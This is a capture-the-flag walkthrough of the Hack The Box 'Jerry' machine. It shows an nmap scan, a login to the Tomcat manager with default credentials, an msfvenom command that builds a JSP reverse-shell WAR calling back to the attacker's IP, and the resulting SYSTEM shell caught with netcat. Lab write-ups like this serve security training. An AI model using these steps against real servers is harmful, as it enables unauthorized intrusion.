hack the box walkthrough – Jerry machine
First Windows HTB machine for my blog today with probably the easiest one called Jerry.
Let’s jump it !
Again we start our enumeration phase with a nmap scanning on the given IP address:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.3 Full Running a Full scan on 10.129.79.3 Host is likely running Windows ---------------------Starting Nmap Full Scan---------------------- Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:27 EST Initiating Parallel DNS resolution of 1 host. at 10:27 Completed Parallel DNS resolution of 1 host. at 10:27, 0.03s elapsed Initiating Connect Scan at 10:27 Scanning 10.129.79.3 [65535 ports] Discovered open port 8080/tcp on 10.129.79.3 Completed Connect Scan at 10:31, 262.72s elapsed (65535 total ports) Nmap scan report for 10.129.79.3 Host is up (0.044s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 8080/tcp open http-proxy Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 262.79 seconds Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:31 EST Nmap scan report for 10.129.79.3 Host is up (0.046s latency). PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds
As you can see I am now getting used with nmapAutomator. It is very convenient and fast.
From the nmap scan result we can read that we are dealing with a Windows Machine and only a tomcat service is listening on port 8080.
Few login attempts on the tomcat web application manager gave me access with the combinaison login/password tomcat/s3cret
Since I can deploy new application, I am going to create my reverse shell via a malicious war file.
[email protected]:~/Documents$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.64 LPORT=4242 -f war -o revshell.war WARN: Unresolved or ambiguous specs during Gem::Specification.reset: reline (>= 0) Available/installed versions of this gem: - 0.1.5 - 0.1.3 WARN: Clearing out unresolved specs. Try 'gem cleanup
' Please report a bug if this causes problems. Payload size: 1089 bytes Final size of war file: 1089 bytes Saved as: revshell.war
I just need to deploy it from the tomcat web application manager:
Then it is available as application:
I ran my listener:
[email protected]:~/Documents$ nc -lvnp 4242 listening on [any] 4242 ...
And ran the application by accessing it with the URL http://IP:8080/revshell/
The shell spawned with already all rights on the machine:
[email protected]:~/Documents$ nc -lvnp 4242 listening on [any] 4242 ... connect to [10.10.14.64] from (UNKNOWN) [10.129.79.3] 49192 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system